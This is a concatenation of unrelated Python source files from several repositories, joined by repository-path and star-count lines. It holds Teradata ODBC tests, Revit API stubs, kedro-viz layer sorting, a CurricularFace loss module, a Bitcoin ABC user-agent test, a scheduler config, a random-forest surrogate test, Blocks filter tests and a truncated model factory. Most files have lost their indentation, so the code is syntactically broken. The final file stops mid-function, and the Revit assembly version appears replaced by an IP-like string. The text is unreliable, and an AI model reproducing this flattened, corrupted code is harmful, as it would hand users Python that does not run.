# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import unittest
import os
import teradata
from teradata import tdodbc, util
class TdOdbcTest (unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.username = cls.password = util.setupTestUser(udaExec, dsn)
def testGlobals(self):
self.assertEqual(tdodbc.apilevel, "2.0")
self.assertEqual(tdodbc.threadsafety, 1)
self.assertEqual(tdodbc.paramstyle, "qmark")
def testSystemNotFound(self):
with self.assertRaises(tdodbc.DatabaseError) as cm:
tdodbc.connect(system="continuum.td.teradata.com",
username=self.username, password=self.password)
self.assertTrue("08004" in cm.exception.msg, cm.exception)
def testBadCredentials(self):
with self.assertRaises(tdodbc.DatabaseError) as cm:
tdodbc.connect(system=system, username="bad", password="<PASSWORD>")
self.assertEqual(cm.exception.code, 8017, cm.exception.msg)
def testConnect(self):
conn = tdodbc.connect(
system=system, username=self.username, password=self.password)
self.assertIsNotNone(conn)
conn.close()
def testConnectBadDriver(self):
with self.assertRaises(tdodbc.InterfaceError) as cm:
tdodbc.connect(
system=system, username=self.username,
password=self.password,
driver="BadDriver")
self.assertEqual(cm.exception.code, "DRIVER_NOT_FOUND")
def testCursorBasics(self):
with tdodbc.connect(system=system, username=self.username,
password=self.password, autoCommit=True) as conn:
self.assertIsNotNone(conn)
with conn.cursor() as cursor:
count = 0
for row in cursor.execute("SELECT * FROM DBC.DBCInfo"):
self.assertEqual(len(row), 2)
self.assertIsNotNone(row[0])
self.assertIsNotNone(row['InfoKey'])
self.assertIsNotNone(row['infokey'])
self.assertIsNotNone(row.InfoKey)
self.assertIsNotNone(row.infokey)
self.assertIsNotNone(row[1])
self.assertIsNotNone(row['InfoData'])
self.assertIsNotNone(row['infodata'])
self.assertIsNotNone(row.infodata)
self.assertIsNotNone(row.InfoData)
row[0] = "test1"
self.assertEqual(row[0], "test1")
self.assertEqual(row['InfoKey'], "test1")
self.assertEqual(row.infokey, "test1")
row['infokey'] = "test2"
self.assertEqual(row[0], "test2")
self.assertEqual(row['InfoKey'], "test2")
self.assertEqual(row.infokey, "test2")
row.infokey = "test3"
self.assertEqual(row[0], "test3")
self.assertEqual(row['InfoKey'], "test3")
self.assertEqual(row.InfoKey, "test3")
count += 1
self.assertEqual(cursor.description[0][0], "InfoKey")
self.assertEqual(cursor.description[0][1], tdodbc.STRING)
self.assertEqual(cursor.description[1][0], "InfoData")
self.assertEqual(cursor.description[1][1], tdodbc.STRING)
self.assertEqual(count, 3)
def testExecuteWithParamsMismatch(self):
with self.assertRaises(teradata.InterfaceError) as cm:
with tdodbc.connect(system=system, username=self.username,
                                password=self.password,
autoCommit=True) as conn:
self.assertIsNotNone(conn)
with conn.cursor() as cursor:
cursor.execute(
"CREATE TABLE testExecuteWithParamsMismatch (id INT, "
"name VARCHAR(128), dob TIMESTAMP)")
cursor.execute(
"INSERT INTO testExecuteWithParamsMismatch "
"VALUES (?, ?, ?)", (1, "TEST", ))
self.assertEqual(
cm.exception.code, "PARAMS_MISMATCH", cm.exception.msg)
configFiles = [os.path.join(os.path.dirname(__file__), 'udaexec.ini')]
udaExec = teradata.UdaExec(configFiles=configFiles, configureLogging=False)
dsn = 'ODBC'
odbcConfig = udaExec.config.section(dsn)
system = odbcConfig['system']
super_username = odbcConfig['username']
super_password = odbcConfig['password']
if __name__ == '__main__':
unittest.main()
|
release/stubs.min/Autodesk/Revit/UI/Plumbing.py | htlcnn/ironpython-stubs | 182 | 16357 | <reponame>htlcnn/ironpython-stubs
# encoding: utf-8
# module Autodesk.Revit.UI.Plumbing calls itself Plumbing
# from RevitAPIUI,Version=172.16.58.3,Culture=neutral,PublicKeyToken=null
# by generator 1.145
# no doc
# no imports
# no functions
# classes
class IPipeFittingAndAccessoryPressureDropUIServer(IExternalServer):
""" Interface for external servers providing optional UI for pipe fitting and pipe accessory coefficient calculation. """
def GetDBServerId(self):
"""
GetDBServerId(self: IPipeFittingAndAccessoryPressureDropUIServer) -> Guid
Returns the Id of the corresponding DB server for which this server provides an
optional UI.
Returns: The Id of the DB server.
"""
pass
def ShowSettings(self,data):
"""
ShowSettings(self: IPipeFittingAndAccessoryPressureDropUIServer,data: PipeFittingAndAccessoryPressureDropUIData) -> bool
Shows the settings UI.
data: The input data of the calculation.
   Returns: True if the user makes any changes in the UI, false otherwise.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class PipeFittingAndAccessoryPressureDropUIData(object,IDisposable):
""" The input and output data used by external UI servers for storing UI settings. """
def Dispose(self):
""" Dispose(self: PipeFittingAndAccessoryPressureDropUIData) """
pass
def GetUIDataItems(self):
"""
GetUIDataItems(self: PipeFittingAndAccessoryPressureDropUIData) -> IList[PipeFittingAndAccessoryPressureDropUIDataItem]
Gets all UI data items stored in the UI data.
Returns: An array of UI data items.
"""
pass
def GetUnits(self):
"""
GetUnits(self: PipeFittingAndAccessoryPressureDropUIData) -> Units
Gets units.
Returns: The Units object.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: PipeFittingAndAccessoryPressureDropUIData,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: PipeFittingAndAccessoryPressureDropUIData) -> bool
"""
class PipeFittingAndAccessoryPressureDropUIDataItem(object,IDisposable):
""" The input and output data used by external UI servers for initializing and storing the UI settings. """
def Dispose(self):
""" Dispose(self: PipeFittingAndAccessoryPressureDropUIDataItem) """
pass
def GetEntity(self):
"""
GetEntity(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> Entity
   Returns the entity set by the UI server, or an invalid entity otherwise.
Returns: The returned Entity.
"""
pass
def GetPipeFittingAndAccessoryData(self):
"""
GetPipeFittingAndAccessoryData(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> PipeFittingAndAccessoryData
Gets the fitting data stored in the UI data item.
Returns: The fitting data stored in the UI data item.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: PipeFittingAndAccessoryPressureDropUIDataItem,disposing: bool) """
pass
def SetEntity(self,entity):
"""
SetEntity(self: PipeFittingAndAccessoryPressureDropUIDataItem,entity: Entity)
Stores the entity in the UI data item.
entity: The Entity to be stored.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> bool
"""
|
package/kedro_viz/services/layers.py | pascalwhoop/kedro-viz | 246 | 16368 | <reponame>pascalwhoop/kedro-viz
# Copyright 2021 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
"""`kedro_viz.services.layers` defines layers-related logic."""
import logging
from collections import defaultdict
from typing import Dict, List, Set
from toposort import CircularDependencyError, toposort_flatten
from kedro_viz.models.graph import GraphNode
logger = logging.getLogger(__name__)
def sort_layers(
nodes: Dict[str, GraphNode], dependencies: Dict[str, Set[str]]
) -> List[str]:
"""Given a DAG represented by a dictionary of nodes, some of which have a `layer` attribute,
along with their dependencies, return the list of all layers sorted according to
the nodes' topological order, i.e. a layer should appear before another layer in the list
if its node is a dependency of the other layer's node, directly or indirectly.
For example, given the following graph:
node1(layer=a) -> node2 -> node4 -> node6(layer=d)
| ^
v |
node3(layer=b) -> node5(layer=c)
The layers ordering should be: [a, b, c, d]
In theory, this is a problem of finding the
[transitive closure](https://en.wikipedia.org/wiki/Transitive_closure) in a graph of layers
and then toposort them. The algorithm below follows a repeated depth-first search approach:
    * For every node, find all layers that depend on it in a depth-first search.
* While traversing, build up a dictionary of {node_id -> layers} for the node
that have already been visited.
* Turn the final {node_id -> layers} into a {layer -> layers} to represent the layers'
dependencies. Note: the key is a layer and the values are the parents of that layer,
just because that's the format toposort requires.
* Feed this layers dictionary to ``toposort`` and return the sorted values.
* Raise CircularDependencyError if the layers cannot be sorted topologically,
i.e. there are cycles among the layers.
Args:
nodes: A dictionary of {node_id -> node} represents the nodes in the graph.
dependencies: A dictionary of {node_id -> set(child_ids)}
represents the direct dependencies between nodes in the graph.
Returns:
The list of layers sorted based on topological order.
Raises:
CircularDependencyError: When the layers have cyclic dependencies.
"""
node_layers: Dict[str, Set[str]] = {} # map node_id to the layers that depend on it
def find_child_layers(node_id: str) -> Set[str]:
"""For the given node_id, find all layers that depend on it in a depth-first manner.
Build up the node_layers dependency dictionary while traversing so each node is visited
only once.
Note: Python's default recursive depth limit is 1000, which means this algorithm won't
work for pipeline with more than 1000 nodes. However, we can rewrite this using stack if
we run into this limit in practice.
"""
if node_id in node_layers:
return node_layers[node_id]
node_layers[node_id] = set()
# The layer of the current node can also be considered as depending on that node.
# This is to cater for the edge case where all nodes are completely disjoint from each other
# and no dependency graph for layers can be constructed,
# yet the layers still need to be displayed.
node_layer = getattr(nodes[node_id], "layer", None)
if node_layer is not None:
node_layers[node_id].add(node_layer)
# for each child node of the given node_id,
# mark its layer and all layers that depend on it as child layers of the given node_id.
for child_node_id in dependencies[node_id]:
child_node = nodes[child_node_id]
child_layer = getattr(child_node, "layer", None)
if child_layer is not None:
node_layers[node_id].add(child_layer)
node_layers[node_id].update(find_child_layers(child_node_id))
return node_layers[node_id]
# populate node_layers dependencies
for node_id in nodes:
find_child_layers(node_id)
# compute the layer dependencies dictionary based on the node_layers dependencies,
# represented as {layer -> set(parent_layers)}
layer_dependencies = defaultdict(set)
for node_id, child_layers in node_layers.items():
node_layer = getattr(nodes[node_id], "layer", None)
# add the node's layer as a parent layer for all child layers.
# Even if a child layer is the same as the node's layer, i.e. a layer is marked
# as its own parent, toposort still works so we don't need to check for that explicitly.
if node_layer is not None:
for layer in child_layers:
layer_dependencies[layer].add(node_layer)
# toposort the layer_dependencies to find the layer order.
# Note that for string, toposort_flatten will default to alphabetical order for tie-break.
try:
return toposort_flatten(layer_dependencies)
except CircularDependencyError:
logger.warning(
"Layers visualisation is disabled as circular dependency detected among layers."
)
return []
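

# --- Usage sketch (added for illustration; not part of the original module). ---
# Assumes kedro_viz and toposort are importable. ``sort_layers`` only reads
# ``node.layer`` via getattr, so plain objects with a ``layer`` attribute are
# enough to stand in for GraphNode in this quick demo.
if __name__ == "__main__":
    from types import SimpleNamespace

    demo_nodes = {
        "node1": SimpleNamespace(layer="a"),
        "node2": SimpleNamespace(layer=None),
        "node3": SimpleNamespace(layer="b"),
        "node4": SimpleNamespace(layer=None),
        "node5": SimpleNamespace(layer="c"),
        "node6": SimpleNamespace(layer="d"),
    }
    # {node_id -> set(child_ids)}, mirroring the graph drawn in the docstring above
    demo_dependencies = {
        "node1": {"node2", "node3"},
        "node2": {"node4"},
        "node3": {"node5"},
        "node4": {"node6"},
        "node5": {"node4"},
        "node6": set(),
    }
    print(sort_layers(demo_nodes, demo_dependencies))  # expected: ['a', 'b', 'c', 'd']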
|
torchkit/head/localfc/curricularface.py | sarvex/TFace | 764 | 16412 | <gh_stars>100-1000
from __future__ import print_function
from __future__ import division
import torch
import torch.nn as nn
from torch.nn import Parameter
import math
from torchkit.util.utils import l2_norm
from torchkit.head.localfc.common import calc_logits
class CurricularFace(nn.Module):
""" Implement of CurricularFace (https://arxiv.org/abs/2004.00288)
"""
def __init__(self,
in_features,
out_features,
scale=64.0,
margin=0.5,
alpha=0.1):
""" Args:
in_features: size of each input features
out_features: size of each output features
scale: norm of input feature
margin: margin
"""
super(CurricularFace, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.margin = margin
self.scale = scale
self.alpha = alpha
self.cos_m = math.cos(margin)
self.sin_m = math.sin(margin)
self.threshold = math.cos(math.pi - margin)
self.mm = math.sin(math.pi - margin) * margin
self.kernel = Parameter(torch.Tensor(in_features, out_features))
self.register_buffer('t', torch.zeros(1))
nn.init.normal_(self.kernel, std=0.01)
def forward(self, embeddings, labels):
cos_theta, origin_cos = calc_logits(embeddings, self.kernel)
target_logit = cos_theta[torch.arange(0, embeddings.size(0)), labels].view(-1, 1)
sin_theta = torch.sqrt(1.0 - torch.pow(target_logit, 2))
cos_theta_m = target_logit * self.cos_m - sin_theta * self.sin_m # cos(target+margin)
mask = cos_theta > cos_theta_m
final_target_logit = torch.where(target_logit > self.threshold, cos_theta_m, target_logit - self.mm)
hard_example = cos_theta[mask]
with torch.no_grad():
self.t = target_logit.mean() * self.alpha + (1 - self.alpha) * self.t
cos_theta[mask] = hard_example * (self.t + hard_example)
cos_theta.scatter_(1, labels.view(-1, 1).long(), final_target_logit)
output = cos_theta * self.scale
return output, origin_cos * self.scale
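

# --- Usage sketch (added for illustration; not part of the original module). ---
# Assumes the surrounding torchkit package is importable. Random embeddings and
# labels are used only to show the expected shapes; in real training this head
# sits on top of a backbone and its scaled logits feed a softmax cross-entropy.
if __name__ == "__main__":
    head = CurricularFace(in_features=512, out_features=10)
    embeddings = torch.randn(4, 512)
    labels = torch.randint(0, 10, (4,))
    logits, origin_logits = head(embeddings, labels)
    print(logits.shape, origin_logits.shape)  # both torch.Size([4, 10])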
|
test/functional/feature_uaclient.py | syedrizwanmy/bitcoin-abc | 1,266 | 16421 | #!/usr/bin/env python3
# Copyright (c) 2021 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -uaclientname and -uaclientversion option."""
import re
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import assert_equal
class UseragentTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
self.log.info("test -uaclientname and -uaclientversion")
default_useragent = self.nodes[0].getnetworkinfo()["subversion"]
expected = "/Bitcoin ABC:"
assert_equal(default_useragent[:len(expected)], expected)
default_version = default_useragent[default_useragent.index(':') + 1:]
default_version = default_version[:default_version.index('/')]
self.restart_node(0, ["-uaclientname=Foo Client"])
foo_ua = self.nodes[0].getnetworkinfo()["subversion"]
expected = f"/Foo Client:{default_version}"
assert_equal(foo_ua[:len(expected)], expected)
self.restart_node(0, ["-uaclientversion=123.45"])
foo_ua = self.nodes[0].getnetworkinfo()["subversion"]
expected = "/Bitcoin ABC:123.45"
assert_equal(foo_ua[:len(expected)], expected)
self.log.info(
"non-numeric version allowed (although not recommended in BIP14)")
self.restart_node(0, ["-uaclientversion=Version Two"])
foo_ua = self.nodes[0].getnetworkinfo()["subversion"]
expected = "/Bitcoin ABC:Version Two"
assert_equal(foo_ua[:len(expected)], expected)
self.log.info("test -uaclient doesn't break -uacomment")
self.restart_node(0, ["-uaclientname=<NAME>",
"-uaclientversion=3000",
"-uacomment=spam bacon and eggs"])
bar_ua = self.nodes[0].getnetworkinfo()["subversion"]
expected = "/Bar Client:3000"
assert_equal(bar_ua[:len(expected)], expected)
assert "spam bacon and eggs" in bar_ua
self.log.info("test -uaclientname max length")
self.stop_node(0)
expected = r"Error: Total length of network version string \([0-9]+\) exceeds maximum length \([0-9]+\)\. Reduce the number or size of uacomments\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientname=" + "a" * 256], expected, match=ErrorMatch.FULL_REGEX)
self.log.info("test -uaclientversion max length")
expected = r"Error: Total length of network version string \([0-9]+\) exceeds maximum length \([0-9]+\)\. Reduce the number or size of uacomments\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientversion=" + "a" * 256], expected, match=ErrorMatch.FULL_REGEX)
self.log.info("test -uaclientname and -uaclientversion max length")
expected = r"Error: Total length of network version string \([0-9]+\) exceeds maximum length \([0-9]+\)\. Reduce the number or size of uacomments\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientname=" + "a" * 128, "-uaclientversion=" + "a" * 128], expected, match=ErrorMatch.FULL_REGEX)
self.log.info(
"test -uaclientname and -uaclientversion invalid characters")
for invalid_char in ['/', ':', '(', ')', '*', '!', '₿', '🏃']:
# for client name
expected = r"Error: -uaclientname \(" + \
re.escape(invalid_char) + r"\) contains invalid characters\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientname=" + invalid_char],
expected, match=ErrorMatch.FULL_REGEX)
# for client version
expected = r"Error: -uaclientversion \(" + \
re.escape(invalid_char) + r"\) contains invalid characters\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientversion=" + invalid_char],
expected, match=ErrorMatch.FULL_REGEX)
# for both
expected = r"Error: -uaclientname \(" + \
re.escape(invalid_char) + r"\) contains invalid characters\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientname=" + invalid_char,
"-uaclientversion=" + invalid_char],
expected, match=ErrorMatch.FULL_REGEX)
if __name__ == '__main__':
UseragentTest().main()
|
apps/jobs/settings/config.py | rainydaygit/testtcloudserver | 349 | 16439 | <gh_stars>100-1000
try:
from public_config import *
except ImportError:
pass
HOST = '0.0.0.0'
PORT = 9038
SERVICE_NAME = 'jobs'
SERVER_ENV = 'prod'
SQLALCHEMY_POOL_SIZE = 10
SQLALCHEMY_POOL_RECYCLE = 3600
JOBS = [
    { # Task: daily credit-score check, runs Monday to Friday at 11:30 in the morning
        # check whether each device's borrowing period has expired: send a reminder email and deduct 1 credit point
        'id': 'credit-check-daily', # task id, must be unique
        'func': 'apps.jobs.business.jobs:JobsBusiness.credit_check_daily', # import path of the callable
        'args': None, # arguments
        'trigger': 'cron', # trigger type: cron schedule
        'day_of_week': 'mon-fri', # Monday to Friday
        'hour': 11, # 11 o'clock in the morning
        'minute': 30, # exact minute
        # 'trigger': 'interval', # trigger type: fixed time interval
# 'hours': 10
# 'seconds': 10
},
{
        # update the CI (Jenkins) job data
        'id': 'cijob_update', # task id, must be unique
        'func': 'apps.extention.business.cidata:CiJobBusiness.update_jenkins_data', # import path of the callable
        'args': None, # arguments
        'trigger': 'interval', # trigger type: fixed time interval
'hours': 10
# 'seconds': 10
},
{
        # periodically move the per-route API call statistics from redis into the database
        'id': 'get_statistics_route_job', # task id, must be unique
        'func': 'apps.public.daos.public:get_statistics_route_job', # import path of the callable
        'args': None, # arguments
        'trigger': 'cron', # trigger type: cron schedule (matches the day_of_week/hour fields below)
        'day_of_week': 'mon-fri', # Monday to Friday
        'hour': 3, # 3 o'clock in the morning
        # 'minute': 5, # exact minute
}
]
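
# --- Sanity-check sketch (added for illustration; not part of the original settings). ---
# The job dicts above follow an APScheduler-style add_job layout (id / func /
# trigger / schedule fields); this block only validates the entries offline.
if __name__ == "__main__":
    seen_ids = set()
    for job in JOBS:
        assert job['id'] not in seen_ids, "duplicate job id: %s" % job['id']
        seen_ids.add(job['id'])
        module_path, callable_name = job['func'].split(':')
        print("%s -> %s.%s (trigger=%s)" % (job['id'], module_path, callable_name, job['trigger']))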
|
test/surrogate/test_sk_random_forest.py | Dee-Why/lite-bo | 184 | 16528 | <gh_stars>100-1000
from sklearn.ensemble import RandomForestRegressor
from openbox.utils.config_space import ConfigurationSpace
from openbox.utils.config_space import UniformFloatHyperparameter, \
CategoricalHyperparameter, Constant, UniformIntegerHyperparameter
import numpy as np
from openbox.utils.config_space.util import convert_configurations_to_array
import threading
from joblib import Parallel, delayed
from sklearn.utils.fixes import _joblib_parallel_args
from sklearn.utils.validation import check_is_fitted
from sklearn.ensemble._base import _partition_estimators
def _accumulate_prediction(predict, X, out, lock):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
"""
prediction = predict(X, check_input=False)
with lock:
if len(out) == 1:
out[0] += prediction
else:
for i in range(len(out)):
out[i] += prediction[i]
def _collect_prediction(predict, X, out, lock):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
"""
prediction = predict(X, check_input=False)
with lock:
out.append(prediction)
def predictmv(rf, X):
check_is_fitted(rf)
# Check data
X = rf._validate_X_predict(X)
# Assign chunk of trees to jobs
n_jobs, _, _ = _partition_estimators(rf.n_estimators, rf.n_jobs)
print('n_jobs=', n_jobs)
# avoid storing the output of every estimator by summing them here
if rf.n_outputs_ > 1:
y_hat = np.zeros((X.shape[0], rf.n_outputs_), dtype=np.float64)
else:
print('here, rf.n_outputs_=1')
y_hat = np.zeros((X.shape[0]), dtype=np.float64)
# Parallel loop
lock = threading.Lock()
# Parallel(n_jobs=n_jobs, verbose=rf.verbose,
# **_joblib_parallel_args(require="sharedmem"))(
# delayed(_accumulate_prediction)(e.predict, X, [y_hat], lock)
# for e in rf.estimators_)
#
# y_hat /= len(rf.estimators_)
#
# return y_hat
all_y_preds = list()
Parallel(n_jobs=n_jobs, verbose=rf.verbose,
**_joblib_parallel_args(require="sharedmem"))(
delayed(_collect_prediction)(e.predict, X, all_y_preds, lock)
for e in rf.estimators_)
all_y_preds = np.asarray(all_y_preds, dtype=np.float64)
return all_y_preds
def get_cs():
cs = ConfigurationSpace()
n_estimators = UniformIntegerHyperparameter("n_estimators", 100, 1000, default_value=500, q=50)
num_leaves = UniformIntegerHyperparameter("num_leaves", 31, 2047, default_value=128)
max_depth = Constant('max_depth', 15)
learning_rate = UniformFloatHyperparameter("learning_rate", 1e-3, 0.3, default_value=0.1, log=True)
min_child_samples = UniformIntegerHyperparameter("min_child_samples", 5, 30, default_value=20)
subsample = UniformFloatHyperparameter("subsample", 0.7, 1, default_value=1, q=0.1)
colsample_bytree = UniformFloatHyperparameter("colsample_bytree", 0.7, 1, default_value=1, q=0.1)
cs.add_hyperparameters([n_estimators, num_leaves, max_depth, learning_rate, min_child_samples, subsample,
colsample_bytree])
return cs
n_obs = 50
n_new = 5
cs = get_cs()
cs.seed(1)
configs = cs.sample_configuration(n_obs)
new_configs = cs.sample_configuration(n_new)
X = convert_configurations_to_array(configs)
Y = np.random.RandomState(47).random(size=(n_obs,))
pX = convert_configurations_to_array(new_configs)
print('shape of pX', pX.shape)
rf = RandomForestRegressor(random_state=np.random.RandomState(47), n_estimators=3)
rf.fit(X, Y)
preds = rf.predict(pX)
print(preds)
ppp = predictmv(rf, pX)
print('final predict', ppp)
m = np.mean(ppp, axis=0)
v = np.var(ppp, axis=0)
print(m, v)
print(type(m), type(v))
from joblib import effective_n_jobs
print(effective_n_jobs(None))
|
scripts/regression_tests.py | zhangxaochen/Opt | 260 | 16534 | from opt_utils import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip_compilation", action='store_true', help="skip compilation")
args = parser.parse_args()
if not args.skip_compilation:
compile_all_opt_examples()
for example in all_examples:
args = []
output = run_example(example, args, True).decode('ascii')
with open(example + ".log", "w") as text_file:
text_file.write(output)
|
libs/blocks/tests/test_variable_filter.py | dendisuhubdy/attention-lvcsr | 295 | 16570 | <filename>libs/blocks/tests/test_variable_filter.py
from nose.tools import raises
from blocks.bricks import Bias, Linear, Logistic
from blocks.bricks.parallel import Merge
from blocks.filter import VariableFilter
from blocks.graph import ComputationGraph
from blocks.roles import BIAS, FILTER, PARAMETER, OUTPUT
from theano import tensor
def test_variable_filter():
# Creating computation graph
brick1 = Linear(input_dim=2, output_dim=2, name='linear1')
brick2 = Bias(2, name='bias1')
activation = Logistic(name='sigm')
x = tensor.vector()
h1 = brick1.apply(x)
h2 = activation.apply(h1)
h2.name = "h2act"
y = brick2.apply(h2)
cg = ComputationGraph(y)
parameters = [brick1.W, brick1.b, brick2.parameters[0]]
bias = [brick1.b, brick2.parameters[0]]
brick1_bias = [brick1.b]
# Testing filtering by role
role_filter = VariableFilter(roles=[PARAMETER])
assert parameters == role_filter(cg.variables)
role_filter = VariableFilter(roles=[FILTER])
assert [] == role_filter(cg.variables)
# Testing filtering by role using each_role flag
role_filter = VariableFilter(roles=[PARAMETER, BIAS])
assert parameters == role_filter(cg.variables)
role_filter = VariableFilter(roles=[PARAMETER, BIAS], each_role=True)
assert not parameters == role_filter(cg.variables)
assert bias == role_filter(cg.variables)
# Testing filtering by bricks classes
brick_filter = VariableFilter(roles=[BIAS], bricks=[Linear])
assert brick1_bias == brick_filter(cg.variables)
# Testing filtering by bricks instances
brick_filter = VariableFilter(roles=[BIAS], bricks=[brick1])
assert brick1_bias == brick_filter(cg.variables)
# Testing filtering by brick instance
brick_filter = VariableFilter(roles=[BIAS], bricks=[brick1])
assert brick1_bias == brick_filter(cg.variables)
# Testing filtering by name
name_filter = VariableFilter(name='W_norm')
assert [cg.variables[2]] == name_filter(cg.variables)
# Testing filtering by name regex
name_filter_regex = VariableFilter(name_regex='W_no.?m')
assert [cg.variables[2]] == name_filter_regex(cg.variables)
# Testing filtering by theano name
theano_name_filter = VariableFilter(theano_name='h2act')
assert [cg.variables[11]] == theano_name_filter(cg.variables)
# Testing filtering by theano name regex
theano_name_filter_regex = VariableFilter(theano_name_regex='h2a.?t')
assert [cg.variables[11]] == theano_name_filter_regex(cg.variables)
# Testing filtering by application
appli_filter = VariableFilter(applications=[brick1.apply])
variables = [cg.variables[1], cg.variables[8]]
assert variables == appli_filter(cg.variables)
# Testing filtering by application
appli_filter_list = VariableFilter(applications=[brick1.apply])
assert variables == appli_filter_list(cg.variables)
input1 = tensor.matrix('input1')
input2 = tensor.matrix('input2')
merge = Merge(['input1', 'input2'], [5, 6], 2)
merged = merge.apply(input1, input2)
merge_cg = ComputationGraph(merged)
outputs = VariableFilter(
roles=[OUTPUT], bricks=[merge])(merge_cg.variables)
assert merged in outputs
assert len(outputs) == 3
outputs_application = VariableFilter(
roles=[OUTPUT], applications=[merge.apply])(merge_cg.variables)
assert outputs_application == [merged]
@raises(TypeError)
def test_variable_filter_roles_error():
# Creating computation graph
brick1 = Linear(input_dim=2, output_dim=2, name='linear1')
x = tensor.vector()
h1 = brick1.apply(x)
cg = ComputationGraph(h1)
# testing role error
VariableFilter(roles=PARAMETER)(cg.variables)
@raises(TypeError)
def test_variable_filter_applications_error():
# Creating computation graph
brick1 = Linear(input_dim=2, output_dim=2, name='linear1')
x = tensor.vector()
h1 = brick1.apply(x)
cg = ComputationGraph(h1)
VariableFilter(applications=brick1.apply)(cg.variables)
|
utils/models.py | miladalipour99/time_series_augmentation | 140 | 16583 | from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Flatten, Dropout, Input
from tensorflow.keras.layers import MaxPooling1D, Conv1D
from tensorflow.keras.layers import LSTM, Bidirectional
from tensorflow.keras.layers import BatchNormalization, GlobalAveragePooling1D, Permute, concatenate, Activation, add
import numpy as np
import math
def get_model(model_name, input_shape, nb_class):
if model_name == "vgg":
model = cnn_vgg(input_shape, nb_class)
elif model_name == "lstm1":
model = lstm1(input_shape, nb_class)
elif model_name == "lstm":
model = lstm1v0(input_shape, nb_class)
elif model_name == "lstm2":
model = lstm2(input_shape, nb_class)
elif model_name == "blstm1":
model = blstm1(input_shape, nb_class)
